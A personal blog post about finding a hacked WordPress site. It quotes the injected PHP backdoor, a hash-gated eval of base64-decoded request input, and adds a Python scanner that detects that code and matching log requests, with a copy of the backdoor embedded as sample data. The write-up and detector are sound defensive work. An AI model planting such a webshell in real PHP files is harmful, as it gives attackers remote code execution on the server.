Found you, you bastard!

After days of searching, I finally found out how those hackers kept adding and altering files on monkeylaw.org. Tucked away in the bowels of my WordPress installation were some files who
In some of my WordPress subfolders, some PHP files had code added at the top:

<?php
/**RbMiTpUrSl*/
if ((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) {
    /**ImOmZtEwJz*/
    eval(base64_decode($_REQUEST["mod_content"]));
    /**BjTjFmFxRu*/
    exit();
    /**YjWlRqAmIs*/
}
?>

I looked through my HTTP logs and found that, yup, I was getting requests at several of these files with long, encoded mod_content values. I tested one of these and it did indeed make the wp-stat.php file appear and modify .htaccess. So that’s the hack. I think the initial vector was probably TimThumb. I did have an old version of TimThumb, somewhere in some unused theme, but didn’t give it a thought because I didn’t use it. I now know better.
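Here is a small scanner, added as an example and not part of the original post, for finding this kind of injected code and the requests that drive it. It walks a WordPress tree looking for PHP files that contain an eval(base64_decode($_REQUEST[...])) construct gated by an md5() comparison (plus the padding of random /**AbCdEfGhIj*/ comments seen above), and separately picks out access-log lines whose query string carries a mod_content parameter. The infected file, the clean file, the directory layout and the combined-format log lines are all constructed here for the demonstration; the md5 hash is the one quoted from the injected code above.

```python
"""Scan a WordPress tree for a hash-gated eval(base64_decode($_REQUEST[...])) backdoor
and pick out access-log lines carrying a mod_content parameter. Added example;
sample files, paths and log lines are constructed, not taken from a real site."""
import os
import re
import tempfile

# Indicator 1: eval of a base64-decoded value taken straight from the request.
EVAL_B64_REQUEST = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST)\s*\[", re.IGNORECASE)
# Indicator 2: md5() of a request value compared against a hard-coded 32-hex-digit hash.
MD5_GATE = re.compile(
    r'md5\s*\(\s*\$_(?:REQUEST|GET|POST)\s*\[[^\]]+\]\s*\)\s*==\s*"[0-9a-f]{32}"',
    re.IGNORECASE)
# Indicator 3: random ten-letter /**XxXxXxXxXx*/ comments used as padding between statements.
JUNK_COMMENT = re.compile(r"/\*\*[A-Za-z]{10}\*/")


def classify_php(source: str) -> list[str]:
    """Return the indicators present in one PHP file's source (empty list = nothing found)."""
    hits = []
    if EVAL_B64_REQUEST.search(source):
        hits.append("eval-of-base64-request")
    if MD5_GATE.search(source):
        hits.append("md5-password-gate")
    if len(JUNK_COMMENT.findall(source)) >= 3:
        hits.append("junk-comment-padding")
    return hits


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk root and return {relative path: indicators} for every flagged .php file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                source = fh.read()  # read everything: the code need not sit at the top
            hits = classify_php(source)
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Combined log format (assumed); only the request target is needed here.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_requests(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (client ip, path) for requests whose query string carries mod_content.
    Note: a mod_content sent in a POST body never reaches the access log, so this
    only catches the GET form; POSTs to odd theme/plugin files still deserve a look."""
    out = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and "mod_content=" in m.group("target"):
            out.append((m.group("ip"), m.group("target").split("?")[0]))
    return out


# Constructed sample data: the injected line quoted in the post, a clean file, two log lines.
BACKDOOR = ('<?php /**RbMiTpUrSl*/if((md5($_REQUEST["img_id"]) == '
            '"ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { '
            '/**ImOmZtEwJz*/eval(base64_decode($_REQUEST["mod_content"])); '
            '/**BjTjFmFxRu*/exit();/**YjWlRqAmIs*/ } ?>\n')
CLEAN = "<?php\n// ordinary theme file (constructed)\necho 'hello';\n"
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2012:03:14:07 +0000] "GET /wp-content/themes/old/header.php'
    '?img_id=secret&mod_content=ZWNobyAxOw== HTTP/1.1" 200 12',
    '198.51.100.4 - - [10/Jan/2012:03:15:00 +0000] "GET /index.php HTTP/1.1" 200 5123',
]


def demo() -> dict[str, list[str]]:
    """Build a throwaway tree with one clean and one infected file and scan it."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    theme_dir = os.path.join(root, "wp-content", "themes", "old")
    os.makedirs(theme_dir)
    with open(os.path.join(theme_dir, "header.php"), "w", encoding="utf-8") as fh:
        fh.write(BACKDOOR + CLEAN)
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN)
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, ", ".join(hits))
    for ip, target in suspicious_requests(SAMPLE_LOG):
        print("mod_content request from", ip, "to", target)
```

Run it against a real install with scan_tree("/path/to/wordpress"); anything it flags is worth diffing against a fresh copy of the plugin or theme, and a junk-comment-padding hit on its own is a good hint even when the eval is written differently.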

The funny thing is, that wasn’t the only hack on my system. Another involved the forums at stripshow.monkeylaw.org — apparently people were able to upload malicious files there, and I don’t know what those files did. So I will have to remain vigilant and see if anything like that returns.

But for right now, I’m content to crack a beer and sit back for a bit.

Update: OK, looks like no sitting back just yet. Turns out they still have some kind of way in. The files appear to be changing, too. Weird.